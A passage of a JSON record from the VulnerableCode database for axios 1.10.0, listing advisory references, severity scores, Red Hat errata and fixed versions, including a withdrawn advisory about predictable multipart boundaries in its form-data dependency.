                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
                },
                {
                    "reference_url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
                },
                {
                    "reference_url": "https://github.com/axios/axios/pull/7369",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/pull/7369"
                },
                {
                    "reference_url": "https://github.com/axios/axios/pull/7388",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/pull/7388"
                },
                {
                    "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/axios/axios/releases/tag/v0.30.0"
                },
                {
                    "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/releases/tag/v0.30.3"
                },
                {
                    "reference_url": "https://github.com/axios/axios/releases/tag/v1.13.5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/releases/tag/v1.13.5"
                },
                {
                    "reference_url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"
                        }
                    ],
                    "url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
                },
                {
                    "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907",
                    "reference_id": "1127907",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907"
                },
                {
                    "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237",
                    "reference_id": "2438237",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-43fc-jf86-j433",
                    "reference_id": "GHSA-43fc-jf86-j433",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-43fc-jf86-j433"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:10184",
                    "reference_id": "RHSA-2026:10184",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:10184"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:11414",
                    "reference_id": "RHSA-2026:11414",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:11414"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:13542",
                    "reference_id": "RHSA-2026:13542",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:13542"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:13548",
                    "reference_id": "RHSA-2026:13548",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:13548"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:2694",
                    "reference_id": "RHSA-2026:2694",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:2694"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:3087",
                    "reference_id": "RHSA-2026:3087",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:3087"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:3105",
                    "reference_id": "RHSA-2026:3105",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:3105"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:3106",
                    "reference_id": "RHSA-2026:3106",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:3106"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:3107",
                    "reference_id": "RHSA-2026:3107",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:3107"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:3109",
                    "reference_id": "RHSA-2026:3109",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:3109"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:4942",
                    "reference_id": "RHSA-2026:4942",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:4942"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5142",
                    "reference_id": "RHSA-2026:5142",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5142"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5168",
                    "reference_id": "RHSA-2026:5168",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5168"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5174",
                    "reference_id": "RHSA-2026:5174",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5174"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5636",
                    "reference_id": "RHSA-2026:5636",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5636"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5665",
                    "reference_id": "RHSA-2026:5665",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5665"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:5807",
                    "reference_id": "RHSA-2026:5807",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:5807"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6170",
                    "reference_id": "RHSA-2026:6170",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6170"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6174",
                    "reference_id": "RHSA-2026:6174",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6174"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192",
                    "reference_id": "RHSA-2026:6192",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6192"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6277",
                    "reference_id": "RHSA-2026:6277",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6277"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6308",
                    "reference_id": "RHSA-2026:6308",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6308"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6309",
                    "reference_id": "RHSA-2026:6309",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6309"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6404",
                    "reference_id": "RHSA-2026:6404",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6404"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6428",
                    "reference_id": "RHSA-2026:6428",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6428"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6497",
                    "reference_id": "RHSA-2026:6497",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6497"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6567",
                    "reference_id": "RHSA-2026:6567",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6567"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6568",
                    "reference_id": "RHSA-2026:6568",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6568"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:6802",
                    "reference_id": "RHSA-2026:6802",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:6802"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:7249",
                    "reference_id": "RHSA-2026:7249",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:7249"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:8218",
                    "reference_id": "RHSA-2026:8218",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:8218"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:8229",
                    "reference_id": "RHSA-2026:8229",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:8229"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:8499",
                    "reference_id": "RHSA-2026:8499",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:8499"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:8500",
                    "reference_id": "RHSA-2026:8500",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:8500"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:8501",
                    "reference_id": "RHSA-2026:8501",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:8501"
                },
                {
                    "reference_url": "https://access.redhat.com/errata/RHSA-2026:9848",
                    "reference_id": "RHSA-2026:9848",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://access.redhat.com/errata/RHSA-2026:9848"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/62853?format=api",
                    "purl": "pkg:npm/axios@1.13.5",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5"
                }
            ],
            "aliases": [
                "CVE-2026-25639",
                "GHSA-43fc-jf86-j433"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/29788?format=api",
            "vulnerability_id": "VCID-xkyu-r89g-ckec",
            "summary": "Withdrawn Advisory: Axios has Transitive Critical Vulnerability via form-data\n### Withdrawn Advisory\nThis advisory has been withdrawn because users of Axios 1.10.0 have the flexibility to use a patched version of form-data, the software in which the vulnerability originates, without upgrading Axios to address GHSA-fjxv-7rqg-78g4.\n\n### Original Description\nA critical vulnerability exists in the form-data package used by `axios@1.10.0`. The issue allows an attacker to predict multipart boundary values generated using `Math.random()`, opening the door to HTTP parameter pollution or injection attacks.\n\nThis was submitted in [issue #6969](https://github.com/axios/axios/issues/6969) and addressed in [pull request #6970](https://github.com/axios/axios/pull/6970).\n\n### Details\nThe vulnerable package `form-data@4.0.0` is used by `axios@1.10.0` as a transitive dependency. It uses non-secure, deterministic randomness (`Math.random()`) to generate multipart boundary strings.\n\nThis flaw is tracked under [Snyk Advisory SNYK-JS-FORMDATA-10841150](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150) and [CVE-2025-7783](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150).\n\nAffected `form-data` versions:\n- <2.5.4\n- >=3.0.0 <3.0.4\n- >=4.0.0 <4.0.4\n\nSince `axios@1.10.0` pulls in `form-data@4.0.0`, it is exposed to this issue.\n\n\n### PoC\n1. Install Axios: - `npm install axios@1.10.0`\n2.Run `snyk test`:\n```\nTested 104 dependencies for known issues, found 1 issue, 1 vulnerable path.\n\n✗ Predictable Value Range from Previous Values [Critical Severity]\nin form-data@4.0.0 via axios@1.10.0 > form-data@4.0.0\n\n```\n3. Trigger a multipart/form-data request. Observe the boundary header uses predictable random values, which could be exploited in a targeted environment.\n\n\n### Impact\n\n- **Vulnerability Type**: Predictable Value / HTTP Parameter Pollution\n- **Risk**: Critical (CVSS 9.4)\n- **Impacted Users**: Any application using axios@1.10.0 to submit multipart form-data\n\n\nThis could potentially allow attackers to:\n- Interfere with multipart request parsing\n- Inject unintended parameters\n- Exploit backend deserialization logic depending on content boundaries\n\n### Related Links\n[GitHub Issue #6969](https://github.com/axios/axios/issues/6969)\n\n[Pull Request #xxxx](https://github.com/axios/axios/pull/xxxx) (replace with actual link)\n\n[Snyk Advisory](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150)\n\n[form-data on npm](https://www.npmjs.com/package/form-data)",
            "references": [
                {
                    "reference_url": "https://github.com/advisories/GHSA-fjxv-7rqg-78g4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fjxv-7rqg-78g4"
                },
                {
                    "reference_url": "https://github.com/axios/axios",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios"
                },
                {
                    "reference_url": "https://github.com/axios/axios/issues/6969",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios/issues/6969"
                },
                {
                    "reference_url": "https://github.com/axios/axios/pull/6970",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios/pull/6970"
                },
                {
                    "reference_url": "https://github.com/axios/axios/security/advisories/GHSA-rm8p-cx58-hcvx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/axios/axios/security/advisories/GHSA-rm8p-cx58-hcvx"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54371",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54371"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783"
                },
                {
                    "reference_url": "https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rm8p-cx58-hcvx",
                    "reference_id": "GHSA-rm8p-cx58-hcvx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rm8p-cx58-hcvx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/70536?format=api",
                    "purl": "pkg:npm/axios@1.11.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aq84-8cnz-byax"
                        },
                        {
                            "vulnerability": "VCID-x41s-g5mh-pkdq"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.11.0"
                }
            ],
            "aliases": [
                "CVE-2025-54371",
                "GHSA-rm8p-cx58-hcvx"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xkyu-r89g-ckec"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.0",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.10.0"
}

Package Instance